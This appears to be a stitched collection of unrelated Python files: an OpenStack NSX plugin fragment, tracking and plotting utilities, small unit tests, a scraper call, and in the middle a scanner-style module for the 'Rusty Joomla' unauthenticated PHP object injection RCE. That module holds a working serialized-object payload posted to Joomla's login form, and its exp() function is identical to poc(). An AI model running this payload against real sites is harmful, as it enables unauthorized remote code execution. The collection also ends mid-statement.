context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
self._resource_set_status(
context, loadbalancer_db.PoolMonitorAssociation,
monitor_id, service_constants.ACTIVE, res,
pool_id=pool_id)
return res
def delete_pool_health_monitor(self, context, id, pool_id):
super(NsxAdvancedPlugin, self).delete_pool_health_monitor(
context, id, pool_id)
pool = self.get_pool(context, pool_id)
#Check whether the pool is already associated with the vip
if pool.get('vip_id'):
#Delete the monitor on vshield edge
edge_id = self._get_edge_id_by_vip_id(context, pool['vip_id'])
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(
_("Failed to update pool with pool_monitor!"))
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ERROR)
#TODO(linb): Add exception handle if error
self.vcns_driver.delete_health_monitor(context, id, edge_id)
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
def _vcns_update_ipsec_config(
self, context, vpnservice_id, removed_ipsec_conn_id=None):
sites = []
vpn_service = self._get_vpnservice(context, vpnservice_id)
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, vpn_service.router_id)
if not vpn_service.router.gw_port:
msg = _("Failed to update ipsec vpn configuration on edge, since "
"the router: %s does not have a gateway yet!"
) % vpn_service.router_id
LOG.error(msg)
raise exceptions.VcnsBadRequest(resource='router', msg=msg)
external_ip = vpn_service.router.gw_port['fixed_ips'][0]['ip_address']
subnet = self._make_subnet_dict(vpn_service.subnet)
for ipsec_site_conn in vpn_service.ipsec_site_connections:
if ipsec_site_conn.id != removed_ipsec_conn_id:
site = self._make_ipsec_site_connection_dict(ipsec_site_conn)
ikepolicy = self._make_ikepolicy_dict(
ipsec_site_conn.ikepolicy)
ipsecpolicy = self._make_ipsecpolicy_dict(
ipsec_site_conn.ipsecpolicy)
sites.append({'site': site,
'ikepolicy': ikepolicy,
'ipsecpolicy': ipsecpolicy,
'subnet': subnet,
'external_ip': external_ip})
try:
self.vcns_driver.update_ipsec_config(
edge_id, sites, enabled=vpn_service.admin_state_up)
except exceptions.VcnsBadRequest:
with excutils.save_and_reraise_exception():
LOG.exception(_("Bad or unsupported Input request!"))
except exceptions.VcnsApiException:
with excutils.save_and_reraise_exception():
msg = (_("Failed to update ipsec VPN configuration "
"with vpnservice: %(vpnservice_id)s on vShield Edge: "
"%(edge_id)s") % {'vpnservice_id': vpnservice_id,
'edge_id': edge_id})
LOG.exception(msg)
def create_vpnservice(self, context, vpnservice):
LOG.debug(_("create_vpnservice() called"))
router_id = vpnservice['vpnservice'].get('router_id')
self.check_router(context, router_id)
if self.get_vpnservices(context, filters={'router_id': [router_id]}):
msg = _("a vpnservice is already associated with the router: %s"
) % router_id
LOG.warning(msg)
raise nsx_exc.ServiceOverQuota(
overs='vpnservice', err_msg=msg)
service = super(NsxAdvancedPlugin, self).create_vpnservice(
context, vpnservice)
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
def update_vpnservice(self, context, vpnservice_id, vpnservice):
vpnservice['vpnservice']['status'] = service_constants.PENDING_UPDATE
service = super(NsxAdvancedPlugin, self).update_vpnservice(
context, vpnservice_id, vpnservice)
# Only admin_state_up attribute is configurable on Edge.
if vpnservice['vpnservice'].get('admin_state_up') is None:
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
# Test whether there is one ipsec site connection attached to
# the vpnservice. If not, just return without updating ipsec
# config on edge side.
vpn_service_db = self._get_vpnservice(context, vpnservice_id)
if not vpn_service_db.ipsec_site_connections:
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
try:
self._vcns_update_ipsec_config(context, service['id'])
except Exception:
with excutils.save_and_reraise_exception():
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ERROR, service)
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
def create_ipsec_site_connection(self, context, ipsec_site_connection):
ipsec_site_conn = super(
NsxAdvancedPlugin, self).create_ipsec_site_connection(
context, ipsec_site_connection)
try:
self._vcns_update_ipsec_config(
context, ipsec_site_conn['vpnservice_id'])
except Exception:
with excutils.save_and_reraise_exception():
super(NsxAdvancedPlugin, self).delete_ipsec_site_connection(
context, ipsec_site_conn['id'])
self._resource_set_status(
context, vpn_db.IPsecSiteConnection,
ipsec_site_conn['id'], service_constants.ACTIVE, ipsec_site_conn)
return ipsec_site_conn
def update_ipsec_site_connection(self, context, ipsec_site_connection_id,
ipsec_site_connection):
ipsec_site_connection['ipsec_site_connection']['status'] = (
service_constants.PENDING_UPDATE)
ipsec_site_conn = super(
NsxAdvancedPlugin, self).update_ipsec_site_connection(
context, ipsec_site_connection_id, ipsec_site_connection)
try:
self._vcns_update_ipsec_config(
context, ipsec_site_conn['vpnservice_id'])
except Exception:
with excutils.save_and_reraise_exception():
self._resource_set_status(
context, vpn_db.IPsecSiteConnection, ipsec_site_conn['id'],
service_constants.ERROR, ipsec_site_conn)
self._resource_set_status(
context, vpn_db.IPsecSiteConnection,
ipsec_site_conn['id'], service_constants.ACTIVE, ipsec_site_conn)
return ipsec_site_conn
def delete_ipsec_site_connection(self, context, ipsec_site_conn_id):
self._resource_set_status(
context, vpn_db.IPsecSiteConnection,
ipsec_site_conn_id, service_constants.PENDING_DELETE)
vpnservice_id = self.get_ipsec_site_connection(
context, ipsec_site_conn_id)['vpnservice_id']
try:
self._vcns_update_ipsec_config(
context, vpnservice_id, ipsec_site_conn_id)
except Exception:
with excutils.save_and_reraise_exception():
self._resource_set_status(
context, vpn_db.IPsecSiteConnection, ipsec_site_conn_id,
service_constants.ERROR)
super(NsxAdvancedPlugin, self).delete_ipsec_site_connection(
context, ipsec_site_conn_id)
class VcnsCallbacks(object):
"""Edge callback implementation Callback functions for
asynchronous tasks.
"""
def __init__(self, plugin):
self.plugin = plugin
def edge_deploy_started(self, task):
"""callback when deployment task started."""
jobdata = task.userdata['jobdata']
context = jobdata['context']
edge_id = task.userdata.get('edge_id')
neutron_router_id = jobdata['neutron_router_id']
name = task.userdata['router_name']
if edge_id:
LOG.debug(_("Start deploying %(edge_id)s for router %(name)s"), {
'edge_id': edge_id,
'name': name})
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id, edge_id=edge_id)
else:
LOG.debug(_("Failed to deploy Edge for router %s"), name)
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id,
status=service_constants.ERROR)
def edge_deploy_result(self, task):
"""callback when deployment task finished."""
jobdata = task.userdata['jobdata']
lrouter = jobdata['lrouter']
context = jobdata['context']
name = task.userdata['router_name']
neutron_router_id = jobdata['neutron_router_id']
router_db = None
try:
router_db = self.plugin._get_router(
context, neutron_router_id)
except l3.RouterNotFound:
# Router might have been deleted before deploy finished
LOG.exception(_("Router %s not found"), lrouter['uuid'])
if task.status == tasks_const.TaskStatus.COMPLETED:
LOG.debug(_("Successfully deployed %(edge_id)s for "
"router %(name)s"), {
'edge_id': task.userdata['edge_id'],
'name': name})
if (router_db and
router_db['status'] == service_constants.PENDING_CREATE):
router_db['status'] = service_constants.ACTIVE
binding = vcns_db.get_vcns_router_binding(
context.session, neutron_router_id)
# only update status to active if its status is pending create
if binding['status'] == service_constants.PENDING_CREATE:
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id,
status=service_constants.ACTIVE)
else:
LOG.debug(_("Failed to deploy Edge for router %s"), name)
if router_db:
router_db['status'] = service_constants.ERROR
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id,
status=service_constants.ERROR)
def edge_delete_result(self, task):
jobdata = task.userdata['jobdata']
router_id = task.userdata['router_id']
context = jobdata['context']
if task.status == tasks_const.TaskStatus.COMPLETED:
vcns_db.delete_vcns_router_binding(context.session,
router_id)
def interface_update_result(self, task):
LOG.debug(_("interface_update_result %d"), task.status)
def snat_create_result(self, task):
LOG.debug(_("snat_create_result %d"), task.status)
def snat_delete_result(self, task):
LOG.debug(_("snat_delete_result %d"), task.status)
def dnat_create_result(self, task):
LOG.debug(_("dnat_create_result %d"), task.status)
def dnat_delete_result(self, task):
LOG.debug(_("dnat_delete_result %d"), task.status)
def routes_update_result(self, task):
LOG.debug(_("routes_update_result %d"), task.status)
def nat_update_result(self, task):
LOG.debug(_("nat_update_result %d"), task.status)
def _process_base_create_lswitch_args(*args, **kwargs):
tags = utils.get_tags()
tags.append({"tag": args[1],
"scope": "quantum_net_id"})
if args[2]:
tags.append({"tag": args[2], "scope": "os_tid"})
switch_name = args[3]
tz_config = args[4]
if kwargs.get("shared", False) or len(args) >= 6:
tags.append({"tag": "true", "scope": "shared"})
if kwargs.get("tags"):
tags.extend(kwargs["tags"])
return switch_name, tz_config, tags
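# The function below is an illustrative, hypothetical usage sketch of
# _process_base_create_lswitch_args() and is not part of the original plugin.
# It only shows how the positional arguments map onto the lswitch name,
# transport zone config and tag list; every literal value is a placeholder.
def _example_process_create_lswitch_args():
    # args layout: (cluster, neutron_net_id, tenant_id, switch_name, tz_config)
    example_tz_config = [{"zone_uuid": "tz-uuid", "transport_type": "stt"}]
    switch_name, tz_config, tags = _process_base_create_lswitch_args(
        None, "neutron-net-id", "tenant-id", "demo-switch",
        example_tz_config, shared=True)
    # tags now carry the quantum_net_id, os_tid and shared scopes
    return switch_name, tz_config, tags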
|
import importlib
import os
class EnvSettings:
def __init__(self):
pytracking_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
self.results_path = '{}/tracking_results/'.format(pytracking_path)
self.segmentation_path = '{}/segmentation_results/'.format(pytracking_path)
self.network_path = '{}/networks/'.format(pytracking_path)
self.result_plot_path = '{}/result_plots/'.format(pytracking_path)
self.otb_path = ''
self.nfs_path = ''
self.lsotb_path = ''
self.ptbtir_path = ''
self._path = ''
self.tpl_path = ''
self.vot_path = ''
self.got10k_path = ''
self.lasot_path = ''
self.trackingnet_path = ''
self.davis_dir = ''
self.youtubevos_dir = ''
self.got_packed_results_path = ''
self.got_reports_path = ''
self.tn_packed_results_path = ''
def create_default_local_file():
comment = {'results_path': 'Where to store tracking results',
'network_path': 'Where tracking networks are stored.'}
path = os.path.join(os.path.dirname(__file__), 'local.py')
with open(path, 'w') as f:
settings = EnvSettings()
f.write('from pytracking.evaluation.environment import EnvSettings\n\n')
f.write('def local_env_settings():\n')
f.write(' settings = EnvSettings()\n\n')
f.write(' # Set your local paths here.\n\n')
for attr in dir(settings):
comment_str = None
if attr in comment:
comment_str = comment[attr]
attr_val = getattr(settings, attr)
if not attr.startswith('__') and not callable(attr_val):
if comment_str is None:
f.write(' settings.{} = \'{}\'\n'.format(attr, attr_val))
else:
f.write(' settings.{} = \'{}\' # {}\n'.format(attr, attr_val, comment_str))
f.write('\n return settings\n\n')
def env_settings():
env_module_name = 'pytracking.evaluation.local'
try:
env_module = importlib.import_module(env_module_name)
return env_module.local_env_settings()
    except ImportError:
env_file = os.path.join(os.path.dirname(__file__), 'local.py')
# Create a default file
create_default_local_file()
raise RuntimeError('YOU HAVE NOT SETUP YOUR local.py!!!\n Go to "{}" and set all the paths you need. '
'Then try to run again.'.format(env_file))
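# A minimal usage sketch (an illustrative addition, not part of the original
# module): it loads the local settings and prints two of the configured paths,
# assuming local.py has already been generated and filled in.
if __name__ == '__main__':
    settings = env_settings()
    print('tracking results path:', settings.results_path)
    print('network weights path :', settings.network_path)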
|
import logging
import unittest
import numpy as np
from bokeh.models.widgets import DataTable
from pandas import DataFrame
from cave.utils.bokeh_routines import array_to_bokeh_table
class TestCSV2RH(unittest.TestCase):
def setUp(self):
self.rng = np.random.RandomState(42)
def test_array_to_bokeh_table(self):
dataframe = DataFrame(self.rng.rand(2, 3), columns=[str(i) for i in range(3)])
self.assertTrue(isinstance(array_to_bokeh_table(dataframe), DataTable))
# Pass logger
self.assertTrue(isinstance(array_to_bokeh_table(dataframe, logger=logging.getLogger('test')), DataTable))
# Pass sortable and width
self.assertTrue(isinstance(array_to_bokeh_table(dataframe,
sortable={'1' : True, '2' : True},
width={'1' : 100, '0' : 200}),
DataTable))
# Pass invalid specifications
self.assertRaises(ValueError, array_to_bokeh_table, dataframe, sortable={'7' : True, '2' : True})
self.assertRaises(ValueError, array_to_bokeh_table, dataframe, width={'1' : 100, 10 : 200})
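# A minimal standalone usage sketch (illustrative data only, not an additional
# test case): it builds a small DataFrame and converts it with the same
# array_to_bokeh_table() helper exercised by the tests above.
def example_table():
    df = DataFrame(np.arange(6).reshape(2, 3), columns=['a', 'b', 'c'])
    return array_to_bokeh_table(df, sortable={'a': True}, width={'b': 120})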
|
from scraper import *
s = Scraper(start=112266, end=114047, max_iter=30, scraper_instance=63)
s.scrape_letterboxd()
|
import pandas as pd
from ms_mint.Resampler import Resampler
def test__Resampler_50ms_minutes_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=False, tau="50ms", unit="minutes").resample(chrom)
tau_in_seconds = result.index[1] * 60
assert tau_in_seconds == 0.05
def test__Resampler_1s_minutes_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=False, tau="1s", unit="minutes").resample(chrom)
tau_in_seconds = result.index[1] * 60
assert tau_in_seconds == 1
def test__Resampler_1s_seconds_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=False, tau="1s", unit="seconds").resample(chrom)
tau_in_seconds = result.index[1]
assert tau_in_seconds == 1
def test__Resampler_smooth_1s_seconds_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=True, tau="1s", unit="seconds").resample(chrom)
tau_in_seconds = result.index[1]
assert tau_in_seconds == 1
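# A minimal usage sketch (illustrative values only, not an additional test):
# it reuses the same Resampler API exercised above to resample a short
# retention-time trace given in minutes onto a regular 1-second grid.
def example_resample_chromatogram():
    chrom = pd.Series([0, 2, 8, 3, 0], index=[0.0, 0.5, 1.0, 1.5, 2.0])
    return Resampler(smooth=False, tau="1s", unit="minutes").resample(chrom)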
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS''',
"description": '''Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution.''',
"severity": "critical",
"references": [
"https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/",
"https://github.com/kiks7/rusty_joomla_rce"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["joomla", "rce", "unauth", "php", "cms", "objectinjection"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
s = requests.Session()
path = """/"""
method = "GET"
data = """"""
headers = {}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/"""
method = "POST"
data = """username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""http://rusty.jooml/;pkwxhxqxmdkkmscotwvh""" in resp1.text and """Failed to decode session object""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
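# A minimal command-line usage sketch (an illustrative addition, not part of
# the original module): the placeholder URL must be replaced with an
# authorized test target before running.
if __name__ == '__main__':
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.example'
    print(poc(target))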
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Style:
Google Python Style Guide:
http://google.github.io/styleguide/pyguide.html
@version 1.0.00
@author-name Wayne Schmidt
@author-email wayne.kirk.schmidt@gmail.com
@license-name APACHE 2.0
@license-url http://www.apache.org/licenses/LICENSE-2.0
"""
__version__ = 1.00
__author__ = "Wayne Schmidt (wayne.kirk.schmidt@gmail.com)"
import os
import sys
import json
from benedict import benedict
JSON_FILE = os.path.abspath(sys.argv[1])
with open (JSON_FILE, "r", encoding='utf8') as fileobject:
myjson = json.load(fileobject)
mydict = benedict(myjson)
keypaths = mydict.keypaths()
for keypath in keypaths:
print(f'path: {keypath}')
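# A follow-up sketch (an illustrative assumption): benedict also supports
# keypath-style item access, so the same loop can print the value stored at
# each path alongside the path itself.
for keypath in keypaths:
    print(f'path: {keypath} -> value: {mydict[keypath]}')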
|
# ============================================================================ #
# #
# This is part of the "GrainSizeTools Script" #
# A Python script for characterizing grain size from thin sections #
# #
# Copyright (c) 2014-present Marco A. Lopez-Sanchez #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
# Version 3.0.2 #
# For details see: http://marcoalopez.github.io/GrainSizeTools/ #
# download at https://github.com/marcoalopez/GrainSizeTools/releases #
# #
# ============================================================================ #
# ============================================================================ #
# Functions to generate the plots using the Python matplotlib library. #
# It uses hex color codes to set colors. #
# Save this file in the same directory as GrainSizeTools #
# ============================================================================ #
# import Python scientific modules
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import norm, gaussian_kde, shapiro, iqr
# plotting funtions
def distribution(data,
plot=('hist', 'kde'),
avg=('amean', 'gmean', 'median', 'mode'),
binsize='auto',
bandwidth='silverman',
**fig_kw):
""" Return a plot with the ditribution of (apparent or actual) grain sizes
in a dataset.
Parameters
----------
data : array_like
the size of the grains
plot : string, tuple or list; optional
the type of plot, either histogram ('hist'), kernel density estimate
('kde') or both ('hist', 'kde'). Default is both.
avg : string, tuple or list; optional
        the central tendency measures to show, either the arithmetic ('amean')
or geometric ('gmean') means, the median ('median'), and/or the
KDE-based mode ('mode'). Default all averages.
binsize : string or positive scalar; optional
If 'auto', it defines the plug-in method to calculate the bin size.
When integer or float, it directly specifies the bin size.
Default: the 'auto' method.
| Available plug-in methods:
| 'auto' (fd if sample_size > 1000 or Sturges otherwise)
| 'doane' (Doane's rule)
| 'fd' (Freedman-Diaconis rule)
| 'rice' (Rice's rule)
| 'scott' (Scott rule)
| 'sqrt' (square-root rule)
        | 'sturges' (Sturges' rule)
bandwidth : string {'silverman' or 'scott'} or positive scalar; optional
the method to estimate the bandwidth or a scalar directly defining the
bandwidth. It uses the Silverman plug-in method by default.
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
Call functions
--------------
- gaussian_kde (from Scipy stats)
Examples
--------
>>> distribution(data['diameters'])
>>> distribution(data['diameters'], figsize=(6.4, 4.8))
Returns
-------
A plot showing the distribution of (apparent) grain sizes and
the location of the averages defined.
"""
fig, ax = plt.subplots(**fig_kw)
if 'hist' in plot:
        if isinstance(binsize, (int, float)):
            # convert a user-given bin width into an equivalent number of bins for ax.hist
            binsize = int(np.ceil((data.max() - data.min()) / binsize))
y_values, bins, __ = ax.hist(data,
bins=binsize,
range=(data.min(), data.max()),
density=True,
color='#80419d',
edgecolor='#C59fd7',
alpha=0.7)
print('=======================================')
print('Number of classes = ', len(bins) - 1)
print('binsize = ', round(bins[1] - bins[0], 2))
print('=======================================')
if 'kde' in plot:
# estimate kde first
if isinstance(bandwidth, (int, float)):
fixed_bw = bandwidth / np.std(data, ddof=1)
kde = gaussian_kde(data, bw_method=fixed_bw)
elif isinstance(bandwidth, str):
kde = gaussian_kde(data, bw_method=bandwidth)
bandwidth = round(kde.covariance_factor() * data.std(ddof=1), 2)
else:
raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")
x_values = np.linspace(data.min(), data.max(), num=1000)
y_values = kde(x_values)
print('=======================================')
print('KDE bandwidth = ', round(bandwidth, 2))
print('=======================================')
if 'hist' in plot:
ax.plot(x_values, y_values,
color='#2F4858')
else:
ax.plot(x_values, y_values,
color='#2F4858')
ax.fill_between(x_values, y_values,
color='#80419d',
alpha=0.65)
# plot the location of the averages
if 'amean' in avg:
amean = np.mean(data)
ax.vlines(amean, 0, np.max(y_values),
linestyle='solid',
color='#2F4858',
label='arith. mean',
linewidth=2.5)
if 'gmean' in avg:
gmean = np.exp(np.mean(np.log(data)))
ax.vlines(gmean, 0, np.max(y_values),
linestyle='solid',
color='#fec44f',
label='geo. mean')
if 'median' in avg:
median = np.median(data)
ax.vlines(median, 0, np.max(y_values),
linestyle='dashed',
color='#2F4858',
label='median',
linewidth=2.5)
if 'mode' in avg and 'kde' in plot:
mode = x_values[np.argmax(y_values)]
ax.vlines(mode, 0, np.max(y_values),
linestyle='dotted',
color='#2F4858',
label='mode',
linewidth=2.5)
ax.set_ylabel('density', color='#252525')
ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
ax.legend(loc='best', fontsize=16)
# ax.set_ylim(bottom=-0.001)
fig.tight_layout()
return fig, ax
def area_weighted(diameters, areas, binsize='auto', **fig_kw):
""" Generate an area-weighted histogram and returns different
area-weighted statistics.
Parameters
----------
diameters : array_like
the size of the grains
areas : array_like
the sectional areas of the grains
binsize : string or positive scalar, optional
If 'auto', it defines the plug-in method to calculate the bin size.
When integer or float, it directly specifies the bin size.
Default: the 'auto' method.
| Available plug-in methods:
| 'auto' (fd if sample_size > 1000 or Sturges otherwise)
| 'doane' (Doane's rule)
| 'fd' (Freedman-Diaconis rule)
| 'rice' (Rice's rule)
| 'scott' (Scott rule)
| 'sqrt' (square-root rule)
        | 'sturges' (Sturges' rule)
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
Examples
--------
>>> area_weighted(data['diameters'], data['Areas'])
>>> area_weighted(data['diameters'], data['Areas'], binsize='doane', dpi=300)
"""
# estimate weighted mean
area_total = np.sum(areas)
weighted_areas = areas / area_total
weighted_mean = np.sum(diameters * weighted_areas)
# estimate mode interval
if type(binsize) is str:
histogram, bin_edges = np.histogram(diameters, bins=binsize, range=(0.0, diameters.max()))
h = bin_edges[1]
else:
bin_edges = np.arange(0.0, diameters.max() + binsize, binsize)
h = binsize
# estimate the cumulative areas of each grain size interval
cumulativeAreas = np.zeros(len(bin_edges))
for index, values in enumerate(bin_edges):
mask = np.logical_and(diameters >= values, diameters < (values + h))
area_sum = np.sum(areas[mask])
cumulativeAreas[index] = round(area_sum, 1)
# get the index of the modal interval
getIndex = np.argmax(cumulativeAreas)
print('=======================================')
print('DESCRIPTIVE STATISTICS')
print(f'Area-weighted mean grain size = {weighted_mean:0.2f} microns')
print('=======================================')
print('HISTOGRAM FEATURES')
print(f'The modal interval is {bin_edges[getIndex]:0.2f} - {bin_edges[getIndex] + h:0.2f} microns')
if type(binsize) is str:
print(f'The number of classes are {len(histogram)}')
print(f'The bin size is {h:0.2f} according to the {binsize} rule')
print('=======================================')
# normalize the y-axis values to percentage of the total area
totalArea = sum(cumulativeAreas)
cumulativeAreasNorm = [(x / float(totalArea)) * 100 for x in cumulativeAreas]
maxValue = max(cumulativeAreasNorm)
#make plot
fig, ax = plt.subplots(**fig_kw)
# figure aesthetics
ax.bar(bin_edges, cumulativeAreasNorm, width=h,
color='#55A868',
edgecolor='#FEFFFF',
align='edge',
alpha=1)
ax.vlines(weighted_mean, ymin=0, ymax=maxValue,
linestyle='--',
color='#1F1F1F',
label='area weighted mean',
linewidth=2)
ax.set_ylabel('normalized area fraction (%)', color='#252525')
ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
ax.legend(loc='best', fontsize=15)
fig.tight_layout()
return fig, ax
def normalized(data, avg='amean', bandwidth='silverman', **fig_kw):
"""Return a log-transformed normalized ditribution of the grain
population. This is useful to compare grain size distributions
beween samples with different average values.
Parameters
----------
data : array-like
the dataset
avg : str, optional
the normalization factor, either 'amean' or 'median'.
Default: 'amean'
bandwidth : str or scalar, optional
the bandwidth of the KDE, by default 'silverman'
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
"""
data = np.log(data)
amean = np.mean(data)
median = np.median(data)
# normalize the data
if avg == 'amean':
norm_factor = amean
norm_data = data / norm_factor
elif avg == 'median':
norm_factor = median
norm_data = data / median
else:
raise ValueError("Normalization factor has to be defined as 'amean' or 'median'")
# estimate KDE
if isinstance(bandwidth, (int, float)):
fixed_bw = bandwidth / np.std(norm_data, ddof=1)
kde = gaussian_kde(norm_data, bw_method=fixed_bw)
elif isinstance(bandwidth, str):
kde = gaussian_kde(norm_data, bw_method=bandwidth)
bandwidth = round(kde.covariance_factor() * norm_data.std(ddof=1), 2)
else:
raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")
x_values = np.linspace(norm_data.min(), norm_data.max(), num=1000)
y_values = kde(x_values)
# Provide details
print('=======================================')
if avg == 'amean':
print(f'Normalized SD = {np.std(norm_data):0.3f}')
if avg == 'median':
print(f'Normalized IQR = {iqr(norm_data):0.3f}')
print('KDE bandwidth = ', round(bandwidth, 2))
print('=======================================')
#make plot
fig, ax = plt.subplots(**fig_kw)
ax.plot(x_values, y_values,
color='#2F4858')
ax.fill_between(x_values, y_values,
color='#d1346b',
alpha=0.5)
ax.vlines(amean / norm_factor, 0, np.max(y_values),
linestyle='solid',
color='#2F4858',
label='arith. mean',
linewidth=2.5)
ax.vlines(median / norm_factor, 0, np.max(y_values),
linestyle='dashed',
color='#2F4858',
label='median',
linewidth=2.5)
ax.set_ylabel('density', color='#252525')
if avg == 'amean':
ax.set_xlabel(r'normalized log grain size ($y / \bar{y}$)', color='#252525')
else:
ax.set_xlabel(r'normalized log grain size ($y / med_{y}$)', color='#252525')
ax.legend(loc='best', fontsize=15)
fig.tight_layout()
return fig, ax
def qq_plot(data, percent=2, **fig_kw):
""" Test whether the underlying distribution follows a lognormal
distribution using a quantile–quantile (q-q) plot and a Shapiro-
Wilk test.
Parameters
----------
data : array-like
the apparent diameters or any other type of data
percent : scalar between 0 and 100
        the percentile interval to estimate, default is 2 %
Call functions
--------------
shapiro from scipy's stats
"""
data = np.sort(np.log(data))
# estimate percentiles in the actual data
percentil = np.arange(1, 100, percent)
actual_data = np.percentile(data, percentil)
# estimate percentiles for theoretical data
mean, std = np.mean(data), np.std(data)
theoretical_data = norm.ppf(percentil / 100, loc=mean, scale=std)
min_val, max_val = theoretical_data.min(), theoretical_data.max()
# make the plot
fig, ax = plt.subplots(**fig_kw)
ax.plot([min_val, max_val], [min_val, max_val],
'-',
color='#2F4858',
label='perfect lognormal')
ax.plot(theoretical_data, actual_data,
'o',
color='C0',
alpha=0.5)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.set_xlabel('theoretical', color='#252525')
ax.set_ylabel('observed', color='#252525')
ax.legend(loc='best', fontsize=18)
# ax.set_aspect('equal')
fig.tight_layout()
# Shapiro-Wilk test
if len(data) > 250:
W, p_value = shapiro(np.random.choice(data, size=250))
else:
W, p_value = shapiro(data)
print('=======================================')
print('Shapiro-Wilk test (lognormal):')
print(f'{W:0.2f}, {p_value:0.2f} (test statistic, p-value)')
if p_value >= 0.05:
print('It looks like a lognormal distribution')
print('(⌐■_■)')
else:
        print("It doesn't look like a lognormal distribution (p-value < 0.05)")
print('(╯°□°)╯︵ ┻━┻')
print('=======================================')
return fig, ax
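# Hedged usage sketch (not part of the original script): a small helper that
# drives the plotting functions above with synthetic lognormal "diameters".
# The function name, seed and lognormal parameters are hypothetical.
def _demo_plots(n=500, seed=42):
    """Exercise distribution() and qq_plot() with synthetic lognormal data."""
    rng = np.random.default_rng(seed)
    diameters = rng.lognormal(mean=3.0, sigma=0.4, size=n)
    distribution(diameters, plot=('hist', 'kde'))
    qq_plot(diameters)
    plt.show()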
if __name__ == '__main__':
